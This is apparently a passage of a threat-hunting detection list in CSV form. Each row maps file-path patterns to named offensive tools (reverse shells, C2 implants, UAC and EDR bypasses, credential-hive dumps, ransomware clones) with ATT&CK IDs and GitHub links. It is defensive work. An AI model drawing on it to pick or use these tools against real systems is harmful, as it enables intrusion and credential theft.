"*\TokenExfiltereter.cs*",".{0,1000}\\TokenExfiltereter\.cs.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z" "*\TokenPlayer.cpp*",".{0,1000}\\TokenPlayer\.cpp.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","10","3","254","46","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z" "*\TokenPlayer.exe*",".{0,1000}\\TokenPlayer\.exe.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","10","3","254","46","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z" "*\TokenPlayer\TokenPlayer\*",".{0,1000}\\TokenPlayer\\TokenPlayer\\.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","10","3","254","46","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z" "*\tokenprivileges.c*",".{0,1000}\\tokenprivileges\.c.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","4","330","38","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" 
"*\tokenprivileges.o*",".{0,1000}\\tokenprivileges\.o.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","4","330","38","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*\TokenStomp.exe*",".{0,1000}\\TokenStomp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\TokenUniverse.zip*",".{0,1000}\\TokenUniverse\.zip.{0,1000}","offensive_tool_keyword","TokenUniverse","An advanced tool for working with access tokens and Windows security policy.","T1134 - T1055 - T1056 - T1222 - T1484","TA0004 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/diversenok/TokenUniverse","1","0","N/A","8","6","529","67","2024-04-12T02:04:50Z","2018-06-22T21:02:16Z" "*\TokenUniverse\TokenUniverse.*",".{0,1000}\\TokenUniverse\\TokenUniverse\..{0,1000}","offensive_tool_keyword","TokenUniverse","An advanced tool for working with access tokens and Windows security policy.","T1134 - T1055 - T1056 - T1222 - T1484","TA0004 - TA0005 - TA0006","N/A","N/A","Credential 
Access","https://github.com/diversenok/TokenUniverse","1","0","N/A","8","6","529","67","2024-04-12T02:04:50Z","2018-06-22T21:02:16Z" "*\Tokenvator\*",".{0,1000}\\Tokenvator\\.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*\tools\DocLnk.exe*",".{0,1000}\\tools\\DocLnk\.exe.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","10","3","209","47","2024-03-24T16:47:03Z","2024-03-24T16:36:46Z" "*\Tools\ResHacker.exe*",".{0,1000}\\Tools\\ResHacker\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\tor.exe*",".{0,1000}\\tor\.exe.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","0","N/A","9","10","N/A","N/A","N/A","N/A" "*\Tor\tor.exe*",".{0,1000}\\Tor\\tor\.exe.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","0","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*\Tor\torrc*",".{0,1000}\\Tor\\torrc.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","0","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*\ToRat\cmd\*",".{0,1000}\\ToRat\\cmd\\.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*\ToRat\keygen\*",".{0,1000}\\ToRat\\keygen\\.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*\ToRat\torat_client\*",".{0,1000}\\ToRat\\torat_client\\.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*\ToRat\torat_server\*",".{0,1000}\\ToRat\\torat_server\\.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*\ToRat-master.zip*",".{0,1000}\\ToRat\-master\.zip.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*\TorBrowser*",".{0,1000}\\TorBrowser.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","0","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*\torbrowser-install-*.exe *",".{0,1000}\\torbrowser\-install\-.{0,1000}\.exe\s\s.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. 
Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","0","N/A","9","10","N/A","N/A","N/A","N/A" "*\tor-browser-win32*.*",".{0,1000}\\tor\-browser\-win32.{0,1000}\..{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","0","N/A","9","10","N/A","N/A","N/A","N/A" "*\tor-browser-win64*.*",".{0,1000}\\tor\-browser\-win64.{0,1000}\..{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","0","N/A","9","10","N/A","N/A","N/A","N/A" "*\tor-static-windows-amd64.zip*",".{0,1000}\\tor\-static\-windows\-amd64\.zip.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*\TortoiseSVNHookScripts.cs*",".{0,1000}\\TortoiseSVNHookScripts\.cs.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*\toteslegit.ps1*",".{0,1000}\\toteslegit\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool 
(RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\tricky.lnk\*",".{0,1000}\\tricky\.lnk\\.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","N/A","N/A","2","108","35","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z" "*\tricky.ps1*",".{0,1000}\\tricky\.ps1.{0,1000}","offensive_tool_keyword","MacroMeter","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","N/A","N/A","2","108","35","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z" "*\tricky.vbs*",".{0,1000}\\tricky\.vbs.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. 
the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","N/A","N/A","2","108","35","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z" "*\tricky2.ps1*",".{0,1000}\\tricky2\.ps1.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","N/A","N/A","2","108","35","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z" "*\TruffleSnout.exe*",".{0,1000}\\TruffleSnout\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\TrustExec.exe*",".{0,1000}\\TrustExec\.exe.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*\tunnel-socks5.py*",".{0,1000}\\tunnel\-socks5\.py.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*\TunnelVision-main*",".{0,1000}\\TunnelVision\-main.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","9","7","N/A","N/A","N/A","N/A" "*\TunnelVisionVM.ova*",".{0,1000}\\TunnelVisionVM\.ova.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","9","7","N/A","N/A","N/A","N/A" "*\turbo-intruder-all.jar*",".{0,1000}\\turbo\-intruder\-all\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","0","N/A","N/A","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*\uac.py*",".{0,1000}\\uac\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential 
Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\uac_bypass.vbs*",".{0,1000}\\uac_bypass\.vbs.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","0","N/A","8","2","154","32","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z" "*\UACBypass.dll*",".{0,1000}\\UACBypass\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\UACME-*.zip*",".{0,1000}\\UACME\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5924","1287","2024-04-17T00:56:06Z","2015-03-28T12:04:33Z" "*\UAC-TokenMagic.ps1*",".{0,1000}\\UAC\-TokenMagic\.ps1.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","10","3","254","46","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z" "*\uberfile.py*",".{0,1000}\\uberfile\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - 
?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*\UefiShell.iso*",".{0,1000}\\UefiShell\.iso.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","1","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*\unDefender.exe*",".{0,1000}\\unDefender\.exe.{0,1000}","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","0","N/A","10","4","321","77","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z" "*\UnhookingPatch\bin2mac.py*",".{0,1000}\\UnhookingPatch\\bin2mac\.py.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","N/A","8","3","274","45","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*\unlock your files.lnk*",".{0,1000}\\unlock\syour\sfiles\.lnk.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" 
"*\UnmanagedPowerShell.cpp*",".{0,1000}\\UnmanagedPowerShell\.cpp.{0,1000}","offensive_tool_keyword","UnmanagedPowerShell","Executes PowerShell from an unmanaged process","T1059 - T1086","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/leechristensen/UnmanagedPowerShell","1","0","N/A","6","5","461","108","2016-03-17T05:20:55Z","2014-12-15T00:59:03Z" "*\UnmanagedPowerShell.exe*",".{0,1000}\\UnmanagedPowerShell\.exe.{0,1000}","offensive_tool_keyword","UnmanagedPowerShell","Executes PowerShell from an unmanaged process","T1059 - T1086","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/leechristensen/UnmanagedPowerShell","1","0","N/A","6","5","461","108","2016-03-17T05:20:55Z","2014-12-15T00:59:03Z" "*\UnmanagedPowerShell.sln*",".{0,1000}\\UnmanagedPowerShell\.sln.{0,1000}","offensive_tool_keyword","UnmanagedPowerShell","Executes PowerShell from an unmanaged process","T1059 - T1086","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/leechristensen/UnmanagedPowerShell","1","0","N/A","6","5","461","108","2016-03-17T05:20:55Z","2014-12-15T00:59:03Z" "*\UnmanagedPowerShell.vcxproj*",".{0,1000}\\UnmanagedPowerShell\.vcxproj.{0,1000}","offensive_tool_keyword","UnmanagedPowerShell","Executes PowerShell from an unmanaged process","T1059 - T1086","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/leechristensen/UnmanagedPowerShell","1","0","N/A","6","5","461","108","2016-03-17T05:20:55Z","2014-12-15T00:59:03Z" "*\unpackerLoadEXE.exe*",".{0,1000}\\unpackerLoadEXE\.exe.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","0","N/A","9","1","50","13","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z" 
"*\UnquotedServicePath.cs*",".{0,1000}\\UnquotedServicePath\.cs.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*\unquotedsvcpath.o*",".{0,1000}\\unquotedsvcpath\.o.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","4","330","38","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*\URL_obfuscated.log*",".{0,1000}\\URL_obfuscated\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\usbmon.txt*",".{0,1000}\\usbmon\.txt.{0,1000}","offensive_tool_keyword","usbmon","USB capture for Linux.","T1052 - T1059 - T1090 - T1105 - T1114 - T1124 - T1497 - T1557","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","https://www.kernel.org/doc/Documentation/usb/usbmon.txt","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
"*\user_persistence_run.c*",".{0,1000}\\user_persistence_run\.c.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*\users\public\desktop\Fix-Your-Files.txt*",".{0,1000}\\users\\public\\desktop\\Fix\-Your\-Files\.txt.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*\Users\Public\DtcInstall.txt*",".{0,1000}\\Users\\Public\\DtcInstall\.txt.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*\Users\Public\nc.exe*",".{0,1000}\\Users\\Public\\nc\.exe.{0,1000}","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","0","N/A","N/A","8","736","180","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z" "*\Users\Public\revshell.exe*",".{0,1000}\\Users\\Public\\revshell\.exe.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - 
TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*\users\public\sam.save*",".{0,1000}\\users\\public\\sam\.save.{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","10","1","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z" "*\users\public\system.save*",".{0,1000}\\users\\public\\system\.save.{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","10","1","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z" "*\Users\Public\termsrv.dll*",".{0,1000}\\Users\\Public\\termsrv\.dll.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file","T1112 - T1055 - T1562.001","TA0003 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","9","4","309","66","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" "*\Users\Public\termsrv.dll*",".{0,1000}\\Users\\Public\\termsrv\.dll.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense 